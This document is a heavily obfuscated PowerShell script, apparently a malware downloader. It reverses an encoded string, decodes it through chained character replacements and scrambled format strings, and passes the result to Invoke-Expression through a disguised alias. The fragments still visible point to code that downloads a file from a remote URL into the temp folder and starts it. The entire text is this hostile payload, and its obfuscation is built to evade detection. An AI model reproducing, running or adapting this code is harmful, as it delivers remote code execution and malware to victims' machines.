$9w3LJv=[CHaR[]]")''nIOj-]52,62,4[CEPSMOC:vNe$ (&|)93]RaHc[]gnirTS[,'GdE'(eCALPer.)421]RaHc[]gnirTS[,'Hvn'(eCALPer.)43]RaHc[]gnirTS[,)911]RaHc[+611]RaHc[+77]RaHc[((eCALPer.)'noisserPxE-EKOvnI Hvn)93]rAhC[,GdEKXHGdEECalpeR-  29]rAhC[,)17]rAhC[+88]rAhC[+021]rAhC[(  ecAlpERc- 63]rAhC[,GdE7VOGdE  ecAlpERc-  ))GdENqMos{GdE,GdEXHekKXH+KXHyjC f-hKXH+KXHvp}1KXH+KXH{}KXH+'+'KXH3{}0{KXH+KXH}KXH+KXH2KXH+KXH{hvpKXH+KXH(KGdE,GdE{ )}hTKXH+KXHLNqAKXH+KXHpEKXH+KXH'+'LKXH+KXHNqliKXH+KXGdE,GdEH+KXH{}7{GdE,GdE+KXH 
GdE,GdEHf{h6VKXH+KXH )KXH+KXHyjChyK'+'XH+KXHjCKXH+KXH,KXH+GdE,GdEHrayjKXGdE,GdEHC,yjKXH'+'+K'+'XHCKXH+KXH-KXH+KXHmoyjKXH+KXHC,yjKXH+KXHCCyjCKXH+KXH,KXH+KXHyKXH+'+'KXHjKXH+KXHCisKXH'+'+GdE,GdE{ )}aTKXH+KXHLNqKXH+KXHadeLKXH+KXHNqmKXH+KXHOGdE,GdE+KXHLNqf{h6VKXH+KXH )yjCtSKXH+KXHyjC,yjCKXH+KXHeyKXH+KXHjC,KXH+KXHyjCKXH+KXHssyjCKXH+KXH,yjCKXH+KXHcorPKXH+KXH-tKXH+KXG'+'dE,Gd'+'Es{KXH+KXGdE,GdES[,)67]RAGdE,GdEyjKXH+K'+'XGdE,GdE KXH+KXH'+'hvpahKXH+KXHvp.}IKXH+K'+'XH{h6VKXH+KXH irU-GdE,GdEKXHhvpKXH(ecALPER.)KXH  

KXH+KXH} KXH'+'+KXGdE,GdEKXH+KXHtKXH+KX'+'HyjKXH+KXGdE,GdEXH+KXHNqOLKXH+KXHLNqnwoD'+'{h6VKXH+KXH( fi  KXH+KXH    
 }      
;}EsKXH+KXHLKXH+KGdE,GdE'+'NKXH+K'+'XHqAPLKXH+KXHNqEGdE,GdEK'+'XH+KXH{}5{}KXH+KXH3{}9KXH+KXH{}0'+'{}8KXGdE,GdEXGdE,GdEyKXH+KXHjCKXH+KXH,KXH+KXHyKXH+KXHjC/:sptGdE,GdEjbKXH+KXHOKXH+KXHmotsuCSPKXGdE,GdEXH+KXH.    KXH+KXHGdE,GdEXHX4pKXH(ecALGdE,GdERA'+'Hc[((ecALPER.)43]RAHc[]GniRTS[,GdE,GdEXH+KXHiF{h6KXH+KXHV'+' eliFtuKXH+KXH'+'O-KXH+'+'KXHGdE,GdEXH+KXHeyjC,yjCovnKXH+KGdE,GdEKXH}DA'+'KXH+KXHoLLNqnKXH+KXHWLKXH+KXH'+'NqoLNqd{h6V KXH+KXH '+'  KXH+KXGdE,GdE+KXH0{KXH+KXHhvp(KXH+KXH = )KXH+KXHyj'+'KXH+KXHCKXH+KXHbKXH+KXHyjCKXH+KXGdE,GdE+87]RAHcGdE,G'+'dEKGdE,GdEHI'+'yjC,yjCdK'+'XH+KXHohtKXH+KXHeMtsyjC,yjCR-KXH+'+'KGdE,GdEKXHjCGdE,GdEHjC,yjCylKXH+KXHerKXH+KXHyjC,KXH+KXHyGdE,GdEKXHyjCt'+'GdE,G'+'dEKXH2{KXH+KXH}KXHGdE,GdEh6VKXH+KXH  

KXH(()KXHxKXH+Gd'+'E,GdE}4{}KXH+KXH6{GdE,G'+'dEXH+KXH }DKXH+KXHAOKXH'+'+KXHLLNqKXH+KXHNWLNqod{KXH+KXH'+'h6VKXHGdE,GdEHCKXH+KXHXCAyKXH+KXHjCf-hvpKXH+KXH}1{KXH+KXGdE,GdEhTKX'+'H+KXHaPLKXH+KXHNqeliKXHGdE,GdEHc[GdE,GdE]03GdE,GdElKG'+'dE,GdEFIyjC,GdE,GdEKXH+KXH 
KX'+'H+KXH;}EULKXHGdE,GdE[emOH'+'SP7'+'VO+]4[emO'+'Hsp7VO ( &GdE,GdEHh6GdE,GdE    
KXH+KXH}    
;}KXH+KXHGdE,GdEH+KXHCKXH+KXHf- hvp}KXH+KXGdE'+',GdEyjCiKXH+KXHsm.UKXH+KXHYGyjC,GdE,GdE ))KXHGXxKXH,KGdE,GdEaP-tyjC,KXH+KXHyKXH+KXHjCseKXH+KXHTyj'+'Cf'+'- hvp}2{}1{}0{hvp(KXH+KXH.KXH+KX'+'H( fi   '+'KXH+KXH  GdE,GdEXHm.UYKXH+KXHGFKXH+KXHIXGdE,GdE[+311]GdE,GdEhvp( KXH+KXH= )yjKXH+KXHCayjC({@]tceGdE,GdE+KXH   KXH+KXH   KXH+KXH
;hvp)b.ih'+'KXH+KXH6V(h6VKXH+K'+'XHX4pPKXH+KXHMEKXH+KXHT:vnKXH+KXHeKXH+KXHh6VKXH+KXHhvp =KXH+KXH KXH+KXH}HTLKXH+KXH'+'NqKXH+KXHAPELNqLIf{h6V      
{ KGdE,GdE   KXH+KXH KXH+KXH'+'
{ )}DALKGdE,GdEH 
}    KXH+KXH
{KXH+KXH hc'+'tKXH+KXHacGdE,GdEH}GdE,GdEyjKXH+KXHC,yjC-yKXH+KXHjC f- hvp}1{}2GdE,GdEKXH+GdE,GdEH1{}2{}0{}3{hvp(.     KXH+KXH 
}     KXH+KXH 
 KXH+KXH;}hTKXH+KXHLGdE,GdEXHALNqf{hKXH+KXH6V = KXH+GdE,GdEH( ;)KXH+KXHyjCKXH+KXHcKXH+KXHyKXH+KXGdE,GdE'+'H   '+' 
GdE,GdEH+KXH'+'[  
(KXH+KXH@KXH+KXH = }atADLNqELGdE,GdEyjC,yKXH+KXHjCKX'+'H+KXHhKXH+KXHyjC,yjCA/evKXH+KXHiKXH+KXHl.raeyGdE,GdEV ni }IKXH+KXH{h6KXH+KXHV( hcaeroKXH+KXHf  '+'
;)
}KXH+KXH)yKXH+GdE,GdEXH+KXHyrt   KXHGd'+'E,GdE )yKXH+K'+'XHjKXH+KXHCKGdE,GdEPER.)KXH7VOKXH,)401]RAHc[+45]RAHc[+68]RAHc[((ecAL'+'PER.)93]RAHc[]GniRTS[,)121]RAHc[+601]RAHc[+76]RAHc[((ecALPER.)69]RAHc[]GniRTGdE,GdEjC/GdE,GdE+KXHNKXH+KXHqRT{h6V =KGdEf-wtM}22{}05{}2{}26{}23{}44{}91{}94{}95{'+'}51{}52{}33{}46{}76{}42{}11{'+'}65{}03{}84{}06{}3{}74{}45{}24{}'+'27{}15{}61{}75{}01{'+'}64{}8{}17{}86{}93{}12{}82{}0{}53{}71{}4{}96{}56{}36{}62{}5{}14{}92{}32{}16{}43{}41{}21{}83{}54'+'{}9{}04{}1{}6{}35{}85{}66{}34{'+'}02{}31{}55{}07{}63{}81{}25{}'+'7{}37{}73{}13{}72{wtM((( '( "; [ARRAY]::reveRse( $9w3LJv) ;" $(Set-vaRIable  'ofS' '' ) "+[StRInG]($9w3LJv ) +"$(seT-ItEM 'VariablE:OFs' ' ' ) " |. ( $SHElliD[1]+$shElLID[13]+'X')
